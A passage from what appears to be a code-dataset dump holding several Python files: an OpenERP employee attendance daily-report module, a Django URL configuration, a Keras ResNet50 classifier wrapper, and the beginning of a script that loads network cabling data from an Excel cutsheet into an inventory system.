del_emp_ids = []\n if new_emp_ids:\n for emp_id in old_emp_ids:\n if not emp_id in new_emp_ids:\n del_emp_ids.append(emp_id)\n else:\n del_emp_ids = old_emp_ids\n #unlink report line of deleted employees \n if del_emp_ids:\n rpt_line_obj = self.pool.get('hr.rpt.attend.emp.day.line')\n unlink_line_ids = rpt_line_obj.search(cr, uid, [('rpt_id','=',ids[0]),('emp_id','in',del_emp_ids)])\n rpt_line_obj.unlink(cr, uid, unlink_line_ids, context=context)\n \n return resu\n \n def unlink(self, cr, uid, ids, context=None):\n for rpt in self.read(cr, uid, ids, ['state'], context=context):\n if rpt['state'] not in ('draft','cancel'):\n raise osv.except_osv(_('Error'),_('Only order with Draft/Cancel state can be delete!'))\n return super(hr_rpt_attend_emp_day, self).unlink(cr, uid, ids, context=context)\n \n def action_confirm(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'confirmed'})\n return True\n\n def action_cancel_draft(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'draft'})\n return True\n \n def action_cancel(self, cr, uid, ids, context=None):\n for rpt in self.browse(cr, uid, ids, context=context):\n if rpt.attend_month_ids:\n for attend_month in rpt.attend_month_ids:\n if attend_month.state != 'cancel':\n raise osv.except_osv(_('Error!'),_('There are related monthly attendance report, please cancel or delete them first!'))\n \n self.write(cr, uid, ids, {'state':'cancel'})\n return True\n \n #generate a new monthly report\n def new_attend_month(self, cr, uid, ids, context=None):\n rpt_id = ids[0]\n #read daily report data, create new monthly report based on it.\n rpt = self.browse(cr, uid, rpt_id, context=context)\n rpt_month_obj = self.pool.get('hr.rpt.attend.month') \n vals = {'date_from':rpt.date_from, \n 'date_to':rpt.date_to, \n 'emp_ids':[(4,emp.id) for emp in rpt.emp_ids],\n 'company_id':rpt.company_id.id,\n 'attend_day_id':rpt.id}\n rpt_month_id = rpt_month_obj.create(cr, uid, vals, context=context)\n #generate report\n rpt_month_obj.run_report(cr, uid, [rpt_month_id], context=context)\n #go to the attendances monthly report view page\n form_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'hr_rpt_attend_month_view')\n form_view_id = form_view and form_view[1] or False\n return {\n 'name': _('Attendances Monthly Report'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': [form_view_id],\n 'res_model': 'hr.rpt.attend.month',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'res_id': rpt_month_id,\n }\n\n #view monthly report\n def view_attend_month(self, cr, uid, ids, context=None):\n rpt_id = ids[0]\n #read daily report data, create new monthly report based on it.\n rpt = self.read(cr, uid, rpt_id, ['attend_month_ids'], context=context)\n rpt_month_ids = rpt['attend_month_ids']\n if not rpt_month_ids:\n raise osv.except_osv(_('Error!'),_('No monthly attendance report generated!'))\n if len(rpt_month_ids) > 1:\n #got to list page\n act_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'hr_rpt_attend_month_action')\n act_id = act_id and act_id[1] or False \n act_win = self.pool.get('ir.actions.act_window').read(cr, uid, act_id, [], context=context)\n act_win['context'] = {'search_default_attend_day_id': rpt['id']}\n return act_win\n else:\n #go to form page\n form_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'hr_rpt_attend_month_view')\n form_view_id = form_view and form_view[1] or False\n return {\n 'name': _('Attendances Monthly Report'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': [form_view_id],\n 'res_model': 'hr.rpt.attend.month',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'res_id': rpt_month_ids[0],\n }\n \n def _attend_hours(self, hours_valid, period):\n \n if hours_valid+0.5 >= period.hours_work_normal:\n hours_normal = period.hours_work_normal\n else: \n hours_normal = hours_valid\n \n hours_ot = hours_valid - hours_normal\n if hours_ot+0.5 >= period.hours_work_ot:\n hours_ot = period.hours_work_ot\n \n #the second time group \n if hours_valid+0.5 >= period.hours_work_normal2:\n hours_normal2 = period.hours_work_normal2\n else:\n hours_normal2 = hours_valid\n \n hours_ot2 = hours_valid - hours_normal2\n if hours_ot2+0.5 >= period.hours_work_ot2:\n hours_ot2 = period.hours_work_ot2\n \n return hours_normal, hours_ot, hours_normal2, hours_ot2\n \n\n def run_report(self, cr, uid, ids, context=None, emp_ids=None):\n rpt = self.browse(cr, uid, ids, context=context)[0]\n if not rpt.emp_ids:\n raise osv.except_osv(_('Warning!'),_('Please select employees to get attendance!'))\n rpt_method = getattr(self, 'run_%s'%(rpt.type,))\n #get report data\n rpt_line_obj, rpt_lns = rpt_method(cr, uid, ids, context, emp_ids=emp_ids)\n #remove the old lines\n unlink_domain = [('rpt_id','=',rpt.id)]\n if emp_ids:\n unlink_domain.append(('emp_id','in',emp_ids))\n unlink_ids = rpt_line_obj.search(cr, uid, unlink_domain, context=context)\n rpt_line_obj.unlink(cr ,uid, unlink_ids, context=context)\n #create new lines\n for rpt_line in rpt_lns:\n rpt_line['rpt_id'] = rpt.id\n rpt_line_obj.create(cr ,uid, rpt_line, context=context) \n #update GUI elements\n self.write(cr, uid, rpt.id, {'show_search':False,'show_result':True,'save_pdf':True},context=context)\n #go to the attendances line view page\n form_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'dmp_hr_attend', 'view_hr_rpt_attend_emp_day_line_tree')\n form_view_id = form_view and form_view[1] or False\n return {\n 'name': _('Attendances Daily Report Line'),\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'view_id': [form_view_id],\n 'res_model': 'hr.rpt.attend.emp.day.line',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'domain': [('rpt_id','=',ids[0])],\n# 'context': {'search_default_groupby_emp':True},\n }\n \n return True\n \n def run_attend_emp_day(self, cr, uid, ids, context=None, emp_ids=None):\n '''\n 1.Query all data with both in/out by date range, store the result in attends_normal\n 2.Loop on by days and employees\n '''\n emp_obj = self.pool.get('hr.employee')\n attend_obj = self.pool.get('hr.attendance')\n \n if context is None: context = {} \n rpt = self.browse(cr, uid, ids, context=context)[0]\n date_from = datetime.strptime(rpt.date_from,DEFAULT_SERVER_DATETIME_FORMAT)\n date_to = datetime.strptime(rpt.date_to,DEFAULT_SERVER_DATETIME_FORMAT)\n #report data line\n rpt_lns = []\n #context for the query\n c = context.copy()\n #get the employees\n if not emp_ids:\n emp_ids = [emp.id for emp in rpt.emp_ids]\n if not emp_ids:\n emp_ids = emp_obj.search(cr, uid, [], context=context)\n #sort the employee ids\n emp_ids.sort()\n \n '''\n 1.Query all data with both in/out by date range, store the result in attends_normal\n '''\n sql = '''\n select emp.id as emp_id, \n period.id as period_id, \n sign_in.day,\n sign_in.action as in_action, sign_in.name as in_time, sign_out.action out_action, sign_out.name out_time\n from hr_employee emp\n left join \n (select name,employee_id,cale_period_id,action,day from hr_attendance where name between %s and %s and action in('sign_in','sign_in_late')) as sign_in\n on emp.id = sign_in.employee_id\n left join \n (select name,employee_id,cale_period_id,action,day from hr_attendance where name between %s and %s and action in('sign_out','sign_out_early')) as sign_out\n on emp.id = sign_out.employee_id and sign_in.day = sign_out.day and sign_in.cale_period_id = sign_out.cale_period_id\n join resource_calendar_attendance period on sign_in.cale_period_id = period.id and sign_out.cale_period_id = period.id\n where emp.id = ANY(%s)\n '''\n cr.execute(sql,(date_from, date_to, date_from, date_to, (emp_ids,)))\n attends = cr.dictfetchall()\n #use the emp_id-day-period_id as the key to store the normal attendance\n# attends_normal = dict(('%s-%s-%s'%(attend['emp_id'], attend['day'], attend['period_id']), attend) for attend in attends)\n attends_normal = {}\n for attend in attends:\n key = '%s-%s-%s'%(attend['emp_id'], attend['day'], attend['period_id'])\n in_time = fields.datetime.context_timestamp(cr, uid, datetime.strptime(attend['in_time'],DEFAULT_SERVER_DATETIME_FORMAT), context=context)\n out_time = fields.datetime.context_timestamp(cr, uid, datetime.strptime(attend['out_time'],DEFAULT_SERVER_DATETIME_FORMAT), context=context)\n attend['in_time'] = in_time\n attend['out_time'] = out_time\n attends_normal[key] = attend\n \n '''\n 2.Loop on by days and employees\n '''\n date_from_local = fields.datetime.context_timestamp(cr, uid, date_from, context)\n date_to_local = fields.datetime.context_timestamp(cr, uid, date_to, context)\n days = rrule.rrule(rrule.DAILY, dtstart=date_from_local,until=date_to_local)\n emps = emp_obj.browse(cr, uid, emp_ids, context)\n seq = 0\n for emp in emps: \n for day_dt in days:\n emp_cale = emp_obj.get_wt(cr, uid, emp.id, day_dt, context=context)\n day = day_dt.strftime('%Y-%m-%d')\n #if there is no working time defined to employee then continue to next employee directly\n if not emp_cale or not emp_cale.attendance_ids:\n seq += 1\n '''\n init a new empty line by employee/day without period info\n '''\n rpt_line = {'seq': seq,\n 'emp_id': emp.id,\n 'day': day_dt,\n 'period_id': None,\n 'sign_in':None,\n 'sign_out':None,\n 'hours_normal':None,\n 'hours_ot':None,\n 'is_late':False,\n 'is_early':False,\n 'is_absent':False, \n 'hours_normal2':None,\n 'hours_ot2':None,}\n rpt_lns.append(rpt_line)\n continue\n for period in emp_cale.attendance_ids:\n if day_dt.isoweekday() != (int(period.dayofweek) + 1):\n continue\n '''\n init a new empty line by employee/day/period\n '''\n seq += 1\n rpt_line = {'seq': seq,\n 'emp_id': emp.id,\n 'day': day_dt,\n 'period_id': period.id,\n 'sign_in':None,\n 'sign_out':None,\n 'hours_normal':None,\n 'hours_ot':None,\n 'is_late':False,\n 'is_early':False,\n 'is_absent':False, \n 'hours_normal2':None,\n 'hours_ot2':None,}\n rpt_lns.append(rpt_line)\n #find the normal attendance by employee/day/period\n attend_key = '%s-%s-%s'%(emp.id, day, period.id)\n attend = attends_normal.get(attend_key, False) \n if attend:\n #found the normal attendance, with sign in and out record, put the data directly\n hour_in = attend['in_time'].hour + attend['in_time'].minute/60.0\n hour_out = attend['out_time'].hour + attend['out_time'].minute/60.0\n hours_valid = hour_out - hour_in - period.hours_non_work\n attend_hours = self._attend_hours(hours_valid, period) \n rpt_line.update({'period_id':period.id, \n 'sign_in':hour_in,\n 'sign_out':hour_out,\n 'hours_normal':attend_hours[0],\n 'hours_ot':attend_hours[1],\n 'is_late':attend['in_action']=='sign_in_late',\n 'is_early':attend['out_action']=='sign_out_early',\n 'hours_normal2':attend_hours[2],\n 'hours_ot2':attend_hours[3],\n })\n continue\n #the abnormal attendance, with sign in or out record only, or without any attendance\n attend_ids = attend_obj.search(cr, uid, [('employee_id','=',emp.id),('day','=',day),('cale_period_id','=',period.id), \n ('action','in',('sign_in','sign_in_late','sign_out','sign_out_early'))], context=context)\n if attend_ids:\n #found sign in or sign out data, there shoule be only one record, so use the first ID to get data\n attend = attend_obj.browse(cr, uid, attend_ids[0], context=context)\n attend_time = fields.datetime.context_timestamp(cr, uid, datetime.strptime(attend.name,DEFAULT_SERVER_DATETIME_FORMAT), context)\n hour_in = None\n hour_out = None\n hours_valid = None\n hours_normal = None\n hours_ot = None\n is_late = False\n is_early = False\n is_absent = False \n hours_normal2 = None\n hours_ot2 = None \n #Only have sign in record\n if attend.action in ('sign_in','sign_in_late'):\n hour_in = attend_time.hour + attend_time.minute/60.0\n if emp_cale.no_out_option == 'early':\n #treat as leave early\n if not period.is_full_ot:\n is_early = True\n hours_valid = period.hour_to - hour_in - period.hours_non_work - emp_cale.no_out_time/60.0\n else:\n #treat as absent\n if not period.is_full_ot:\n is_absent = True\n hours_valid = 0.0\n #Only have sign out record\n if attend.action in ('sign_out','sign_out_early'):\n hour_out = attend_time.hour + attend_time.minute/60.0\n if emp_cale.no_in_option == 'late':\n #treat as leave early\n if not period.is_full_ot:\n is_late = True\n hours_valid = hour_out - period.hour_from - period.hours_non_work - emp_cale.no_in_time/60.0\n else:\n #treat as absent\n if not period.is_full_ot:\n is_absent = True\n hours_valid = 0.0\n if hours_valid:\n hours_normal, hours_ot, hours_normal2, hours_ot2 = self._attend_hours(hours_valid, period)\n \n rpt_line.update({'period_id':period.id, \n 'sign_in':hour_in,\n 'sign_out':hour_out,\n 'hours_normal':hours_normal,\n 'hours_ot':hours_ot,\n 'is_late':is_late,\n 'is_early':is_early,\n 'is_absent':is_absent,\n 'hours_normal2':hours_normal2,\n 'hours_ot2':hours_ot2,\n })\n else:\n if not period.is_full_ot:\n rpt_line.update({'is_absent':True})\n '''========return data to rpt_base.run_report()=========''' \n return self.pool.get('hr.rpt.attend.emp.day.line'), rpt_lns\n \n def _pdf_data(self, cr, uid, ids, form_data, context=None):\n return {'xmlrpt_name': 'hr.rpt.attend.emp.day'}\n \n def save_pdf(self, cr, uid, ids, context=None):\n if context is None: \n context = {}\n form_data = self.read(cr, uid, ids[0], context=context)\n rptxml_name = self._pdf_data(cr, uid, ids[0], form_data, context=context)['xmlrpt_name']\n datas = {\n 'model': self._name,\n 'ids': [ids[0]],\n 'form': form_data,\n }\n return {'type': 'ir.actions.report.xml', 'report_name': rptxml_name, 'datas': datas, 'nodestroy': True} \n \n def print_empday_group(self, cr, uid, ids, context=None, rpt_line_ids = None):\n if context is None:\n context = {}\n '''\n store the groups in dict: {key:{\n val1,val2,...,\n #lines:{key:line_data}\n {}\n valn\n }\n }\n '''\n groups = {}\n #store the calendar worktime types in dict:{calendar_id:type_list}\n cale_wt_types = {}\n \n #get the group data \n rptlines = []\n if not rpt_line_ids: \n #call from self\n rpt = self.browse(cr, uid, ids[0], context=context)\n rptlines = rpt.rpt_lines\n else:\n #this parameter will be called from hr_rpt_attend_emp_day_line.print_empday_line_group()\n rptlines = self.pool.get('hr.rpt.attend.emp.day.line').browse(cr, uid, rpt_line_ids, context=context)\n rpt = rptlines[0].rpt_id\n ids = [rpt.id]\n #handle the attend month report parameter\n attend_month_id = context.get('attend_month_id', None)\n emp_attend_month_lines = {}\n if attend_month_id:\n attend_month_line_obj = self.pool.get('hr.rpt.attend.month.line')\n attend_month_line_ids = attend_month_line_obj.search(cr, uid, [('rpt_id','=',attend_month_id)],context=context)\n emp_ids = attend_month_line_obj.read(cr, uid, attend_month_line_ids, ['emp_id'])\n emp_attend_month_lines = dict((item['emp_id'][0],item['id']) for item in emp_ids) \n \n for rpt_line in rptlines:\n #if from attend month report, only print the employees in the attendance report\n if attend_month_id and not emp_attend_month_lines.get(rpt_line.emp_id.id):\n continue\n key_group = '[%s]%s'%(rpt_line.emp_id.emp_code, rpt_line.emp_id.name)\n if not groups.get(key_group):\n #Add the attendance data\n cale_id = rpt_line.period_id.calendar_id.id\n worktime_types = cale_wt_types.get(cale_id)\n if not worktime_types and cale_id:\n sql = 'select distinct b.id,b.sequence,b.name \\\n from resource_calendar_attendance a \\\n join hr_worktime_type b on a.type_id = b.id \\\n where a.calendar_id=%s \\\n order by b.sequence'\n cr.execute(sql, (cale_id,))\n worktime_types = cr.dictfetchall()\n cale_wt_types[cale_id] = worktime_types\n #set the group values\n group_vals = {'name':key_group,\n 'emp_id': rpt_line.emp_id.id,\n 'date_from': rpt.date_from,\n 'date_to': rpt.date_to,\n 'period_type_a_id':(worktime_types and len(worktime_types) >=1) and worktime_types[0]['id'] or None,\n 'period_type_b_id':(worktime_types and len(worktime_types) >=2) and worktime_types[1]['id'] or None,\n 'period_type_c_id':(worktime_types and len(worktime_types) >=3) and worktime_types[2]['id'] or None,\n 'line_ids_dict':{}}\n #add the attend month line link id\n if attend_month_id:\n group_vals['attend_month_line_id'] = emp_attend_month_lines.get(group_vals['emp_id'])\n groups[key_group] = group_vals\n #append this line\n group_vals = groups.get(key_group)\n #get the group line values in dict\n group_lines = group_vals['line_ids_dict']\n key_group_line = rpt_line.day\n if not group_lines.get(key_group_line):\n group_lines[key_group_line] = {'day':rpt_line.day,'weekday':rpt_line.p_weekday, 'seq':0}\n #add current data\n group_line = group_lines[key_group_line]\n #set the different attendance work time fields by the line data\n if group_vals.get('period_type_a_id') and rpt_line.period_id.type_id.id == group_vals['period_type_a_id']:\n group_line['sign_in_a'] = rpt_line.sign_in\n group_line['sign_out_a'] = rpt_line.sign_out\n group_line['hours_normal_a'] = rpt_line.hours_normal\n group_line['hours_ot_a'] = rpt_line.hours_ot\n group_line['seq'] = rpt_line.seq\n \n if group_vals.get('period_type_b_id') and rpt_line.period_id.type_id.id == group_vals['period_type_b_id']:\n group_line['sign_in_b'] = rpt_line.sign_in\n group_line['sign_out_b'] = rpt_line.sign_out\n group_line['hours_normal_b'] = rpt_line.hours_normal\n group_line['hours_ot_b'] = rpt_line.hours_ot\n if group_vals.get('period_type_c_id') and rpt_line.period_id.type_id.id == group_vals['period_type_c_id']:\n group_line['sign_in_c'] = rpt_line.sign_in\n group_line['sign_out_c'] = rpt_line.sign_out\n group_line['hours_normal_c'] = rpt_line.hours_normal\n group_line['hours_ot_c'] = rpt_line.hours_ot\n \n #sum and create groups data to DB\n group_ids = []\n attend_empday_group_obj = self.pool.get('attend.empday.group')\n group_list = groups.values()\n group_list.sort(lambda x, y: cmp(x['name'], y['name'])) \n for group in group_list:\n group_lines_list = []\n work_hours = 0\n work_hours_ot = 0\n for line in group['line_ids_dict'].values():\n line['hours_normal_total'] = line.get('hours_normal_a',0) + line.get('hours_normal_b',0) + line.get('hours_normal_c',0)\n line['hours_ot_total'] = line.get('hours_ot_a',0) + line.get('hours_ot_b',0) + line.get('hours_ot_c',0)\n work_hours += line['hours_normal_total']\n work_hours_ot += line['hours_ot_total']\n group_lines_list.append((0,0,line))\n group_lines_list.sort(lambda x, y: cmp(x[2]['seq'], y[2]['seq']))\n group['line_ids'] = group_lines_list\n group['days_attend'] = work_hours/8.0\n group['hours_ot'] = work_hours_ot\n group_ids.append(attend_empday_group_obj.create(cr, uid, group, context=context))\n \n #print attendances by group\n if not group_ids:\n return {'type': 'ir.actions.act_window_close'} \n #return report action\n datas = {'model': 'attend.empday.group','ids': group_ids,}\n context.update({'active_model':'attend.empday.group', 'active_ids':group_ids})\n rpt_action = {'type': 'ir.actions.report.xml', \n 'report_name': 'attend.empday.group', \n 'datas': datas, \n 'nodestroy': True,\n 'context':context}\n return rpt_action\n \nhr_rpt_attend_emp_day()\n\nclass attend_empday_group(osv.osv_memory):\n _name = \"attend.empday.group\"\n _columns = {\n 'name': fields.char('Group', size=64, required=True),\n 'emp_id': fields.many2one('hr.employee', 'Employee',),\n 'date_from': fields.datetime(\"Start Date\", required=True),\n 'date_to': fields.datetime(\"End Date\", required=True),\n 'line_ids': fields.one2many('attend.empday.group.line','group_id',string='Group Lines'),\n 'period_type_a_id': fields.many2one('hr.worktime.type', string='Worktime A'),\n 'period_type_b_id': fields.many2one('hr.worktime.type', string='Worktime B'),\n 'period_type_c_id': fields.many2one('hr.worktime.type', string='Worktime C'),\n 'days_attend':fields.float('Attended Days'),\n 'hours_ot':fields.float('Overtime'), \n 'attend_month_line_id':fields.many2one('hr.rpt.attend.month.line', string='Attend Month Line')\n } \n \n def get_report_name(self, cr, uid, id, rpt_name, context=None):\n return \"Attendance Employee Daily Report\"\n \nclass attend_empday_group_line(osv.osv_memory):\n _name = \"attend.empday.group.line\"\n _columns = {\n 'group_id': fields.many2one('attend.empday.group', string='Group'),\n 'seq': fields.integer('Sequence'),\n 'day': fields.char('Day', store=True, size=32),\n 'weekday': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')],string='Day of Week'), \n \n 'sign_in_a':fields.float('Sign In'),\n 'sign_out_a':fields.float('Sign Out'),\n 'hours_normal_a':fields.float('Work Normal'),\n 'hours_ot_a':fields.float('Work OT'),\n \n 'sign_in_b':fields.float('Sign In'),\n 'sign_out_b':fields.float('Sign Out'),\n 'hours_normal_b':fields.float('Work Normal'),\n 'hours_ot_b':fields.float('Work OT'),\n \n 'sign_in_c':fields.float('Sign In'),\n 'sign_out_c':fields.float('Sign Out'),\n 'hours_normal_c':fields.float('Work Normal'),\n 'hours_ot_c':fields.float('Work OT'),\n \n \n 'hours_normal_total':fields.float('Work Normal'),\n 'hours_ot_total':fields.float('Work OT'), \n } \n\nclass hr_rpt_attend_emp_day_line(osv.osv):\n _name = \"hr.rpt.attend.emp.day.line\"\n _description = \"HR Attendance Employee Daily Report Lines\"\n _order = 'seq'\n _columns = { \n 'rpt_id': fields.many2one('hr.rpt.attend.emp.day', 'Report', select=True, required=True, ondelete='cascade'),\n 'seq': fields.integer('Sequence',group_operator='None'),\n 'emp_id': fields.many2one('hr.employee', 'Employee',),\n 'emp_code': fields.related('emp_id','emp_code',string='Code', type='char',store=True),\n 'emp_name': fields.related('emp_id','name',string='Name', type='char'),\n \n #'day': fields.char('Day', store=True, size=32),\n 'day': fields.date(\"Day\", required=True),\n 'period_id': fields.many2one('resource.calendar.attendance','Period'),\n 'p_weekday': fields.related('period_id','dayofweek',type='selection',\n selection=[('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')],\n string='Day of Week'), \n 'p_hour_from': fields.related('period_id','hour_from',type='float',string='From'),\n 'p_hour_to': fields.related('period_id','hour_to',type='float',string='To'),\n 'p_hours_normal': fields.related('period_id','hours_work_normal',type='float',string='Normal'),\n 'p_hour_ot': fields.related('period_id','hours_work_ot',type='float',string='OT'),\n \n 'sign_in':fields.float('Sign In',group_operator='None'),\n 'sign_out':fields.float('Sign Out',group_operator='None'),\n #the hours that working normal in fact\n 'hours_normal':fields.float('Work Normal'),\n #the hours that working OT in fact\n 'hours_ot':fields.float('Work OT'),\n 'is_late':fields.boolean('Be Late'),\n 'is_early':fields.boolean('Leave Early'),\n 'is_absent':fields.boolean('Absenteeism'),\n #the hours that working normal2 in fact\n 'hours_normal2':fields.float('Work Normal2'),\n #the hours that working OT2 in fact\n 'hours_ot2':fields.float('Work OT2'),\n 'state': fields.related('rpt_id','state',type='selection',selection=[\n ('draft', 'Draft'),\n ('confirmed', 'Confirmed'),\n ('cancel', 'Cancel'),\n ], string = 'Status', readonly=True), \n \n }\n #called by server action \"action_server_hr_empday_line_pdf\", to print the employee daily attendance\n def print_empday_line_group(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n if not ids:\n return False\n return self.pool.get('hr.rpt.attend.emp.day').print_empday_group(cr, uid, [], context=context, rpt_line_ids = ids)\n \nhr_rpt_attend_emp_day_line()\n\nfrom openerp.report import report_sxw\nfrom openerp.addons.dm_base.rml import rml_parser_ext\n\n\nclass attend_empday_group_print(rml_parser_ext):\n def __init__(self, cr, uid, name, context):\n super(attend_empday_group_print, self).__init__(cr, uid, name, context=context)\n self.localcontext.update({\n 'time': time,\n 'weekday': self.weekday,\n })\n def weekday(self, weekday):\n return int(weekday) + 1\n \nreport_sxw.report_sxw('report.hr.rpt.attend.emp.day', 'hr.rpt.attend.emp.day', 'addons/dmp_hr_attend/wizard/hr_rpt_attend_emp_day.rml', parser=rml_parser_ext, header='internal')\nreport_sxw.report_sxw('report.attend.empday.group','attend.empday.group','addons/dmp_hr_attend/wizard/hr_rpt_attend_emp_day_group.rml',parser=attend_empday_group_print, header='internal') \n\n'''\nGeneate daily attendance wizard, called by button named \"run_report_wizard\" on the form view\n'''\nclass hr_rpt_attend_emp_day_wizard(osv.osv_memory):\n _name = 'hr.rpt.attend.emp.day.wizard'\n _description = 'Generate daily attendances'\n _columns = {\n 'emp_ids' : fields.many2many('hr.employee', string='Selected Employees', required=True),\n }\n \n def default_get(self, cr, uid, fields, context=None):\n vals = super(hr_rpt_attend_emp_day_wizard, self).default_get(cr, uid, fields, context=context)\n if not vals:\n vals = {}\n #employees\n if context.get('active_model','') == 'hr.rpt.attend.emp.day' and context.get('active_id'):\n emp_ids = self.pool.get('hr.rpt.attend.emp.day').read(cr, uid, context.get('active_id'), ['emp_ids'])['emp_ids']\n vals['emp_ids'] = emp_ids\n \n return vals\n \n def set_data(self, cr, uid, ids, context=None):\n emp_ids = self.read(cr, uid, ids[0], ['emp_ids'], context=context)['emp_ids']\n if not emp_ids:\n raise osv.except_osv(_('Error'), _('Please select employees!'))\n \n emp_day_obj = self.pool.get('hr.rpt.attend.emp.day')\n emp_day_id = context.get('active_id')\n #add new emp_ids\n old_emp_ids = emp_day_obj.read(cr, uid, emp_day_id, ['emp_ids'], context=context)['emp_ids']\n new_emp_ids = [(4,emp_id) for emp_id in emp_ids if emp_id not in old_emp_ids]\n if new_emp_ids:\n emp_day_obj.write(cr, uid, emp_day_id, {'emp_ids':new_emp_ids}, context=context)\n #generate data for the selected employees \n return emp_day_obj.run_report(cr, uid, [emp_day_id], context=context, emp_ids=emp_ids)\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"dmp_hr_attend/wizard/hr_rpt_attend_emp_day.py","file_name":"hr_rpt_attend_emp_day.py","file_ext":"py","file_size_in_byte":41245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"226466014","text":"from django.urls import path, include\nfrom .views import EventCreateView, EventRetrieveDestroyUpdateView, EventListView\nfrom rest_framework.routers import DefaultRouter\n\n\nrouter = DefaultRouter()\nrouter.register(r'', EventListView)\n\nurlpatterns = [\n path('create/', EventCreateView.as_view()),\n path('/', EventRetrieveDestroyUpdateView.as_view()),\n path('', include(router.urls))\n]\n","sub_path":"apps/event/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"335433763","text":"from art.classifiers import KerasClassifier\nfrom tensorflow.keras.applications.resnet50 import ResNet50, preprocess_input\n\npreprocessing_fn = preprocess_input\n\n\ndef get_art_model(model_kwargs, wrapper_kwargs):\n model = ResNet50(**model_kwargs)\n wrapped_model = KerasClassifier(model, **wrapper_kwargs)\n return wrapped_model\n","sub_path":"armory/baseline_models/keras/keras_resnet50.py","file_name":"keras_resnet50.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"85995077","text":"#!/apollo/sbin/envroot \"$ENVROOT/python3.6/bin/python3.6\"\nimport pandas as pd\nimport xlwt\nimport sys\nfrom dxd_tools_dev.modules import jukebox\nimport argparse\n\n\n'''\nSummary: This script is used to update cabling info from cutsheet to JukeBox. \n\nCommand to execute the script:\n\n/apollo/env/DXDeploymentTools/bin/vc_edit_cabling_jb.py --cutsheet '/home/anudeept/SYD52_BR_AGG_JB.xlsx' --device 'syd52-vc-bar-r1'\n\nusage: vc_edit_cabling_jb.py [-h] -c -d\n\nScript to add new VC device to JukeBox based on cutsheet provided\n\noptional arguments:\n -h, --help show this help message and exit\n -c , --cutsheet Full path to the cutsheet (ex:/home/anudeept/BJS20-HAMboneV7.xlsx)\n -d , --device vc device\n\nVersion:# 2.0\nAuthor : anudeept@ \n'''\n\n\nclass bcolors:\n\tCLEARBLUE = '\\033[96m'\n\tHEADER = '\\033[95m'\n\tOKBLUE = '\\033[94m'\n\tWARNING = '\\033[93m'\n\tOKGREEN = '\\033[92m'\n\tFAIL = '\\033[91m'\n\tENDC = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\ndef parse_args() -> str:\n parser = argparse.ArgumentParser(description=\"Script to add cabling info to JukeBox from cutsheet\")\n parser.add_argument('-d','--device', type=str, metavar = '', required= True, help = 'vc device')\n parser.add_argument('-c','--cutsheet',type=str, metavar = '', required = True, help = 'Full path to the cutsheet (ex: /home/anudeept/BJS20-HAMboneV7.xlsx)')\n return parser.parse_args() \n\n\ndef cabling_info(args):\n print(bcolors.HEADER,f\"Info >> Reading info from Cutsheet\",bcolors.ENDC)\n df = pd.read_excel(args.cutsheet,sheet_name=None)\n df_new = pd.DataFrame()\n \n # verify df \n if len(df) != 0:\n for info in df.items():\n df_new = df_new.append(info[1])\n else:\n print(bcolors.FAIL,f'Error >> Excel sheet is not in the right format, please verify',bcolors.ENDC)\n sys.exit()\n\n df_new = df_new.dropna(axis=0,how='all')\n df_new = df_new.dropna(axis=1,how='all')\n \n # Get list of a side devices\n try:\n a_devices = list(df_new['a_hostname'].unique())\n a_devices = [str(device) for device in a_devices]\n except KeyError:\n print(bcolors.FAIL,f'Error >> Could not find a_hostname column in cutsheet, please check cutsheet',bcolors.ENDC)\n sys.exit()\n\n #Check if required column names are in cutsheet\n try:\n df_cabling = df_new[['a_hostname','a_interface','z_hostname','z_interface']]\n except:\n print(bcolors.FAIL,f'Error >> Cutsheet not in right format for script',bcolors.ENDC)\n print(bcolors.FAIL,f'Error >> Please check https://w.amazon.com/bin/view/DXDEPLOY_Automation_Others/Scripts/vc_edit_cabling_jb.py/',bcolors.ENDC)\n sys.exit()\n \n print(bcolors.OKGREEN,f\"INFO >> Cutsheet is valid\",bcolors.ENDC)\n\n print(bcolors.OKBLUE,f'INFO >> Verifying if {args.device} is in cutsheet',bcolors.ENDC)\n\n if args.device not in a_devices:\n print(bcolors.FAIL,f'INFO >> {args.device} is not in cutsheet, please check the argument passed',bcolors.ENDC)\n else:\n print(bcolors.OKGREEN,f'INFO >> Found {args.device} in cutsheet',bcolors.ENDC)\n \n df_cabling = df_cabling.dropna(axis=0,how='all')\n df_cabling = df_cabling.dropna(axis=1,how='all')\n \n final_df = df_cabling[df_cabling['a_hostname'] == args.device]\n final_df = final_df.dropna(axis=0,how='all')\n final_df = final_df.dropna(axis=1,how='all')\n \n print(bcolors.OKBLUE,f\"Info >> Creating cabling for {args.device}\",bcolors.ENDC)\n \n #get cabling info from JukeBox\n try:\n device_cabling = jukebox.get_device_detail(args.device).data.cabling\n except:\n print(bcolors.FAIL,f\"Error >> Could not get cabling info for {args.device}, please check {args.device} exists in Jukebox and try again\",bcolors.ENDC)\n sys.exit()\n \n print(bcolors.OKBLUE,f\"Info >> Updating cabling info from cutsheet for {args.device}\",bcolors.ENDC)\n \n #Create new cabling 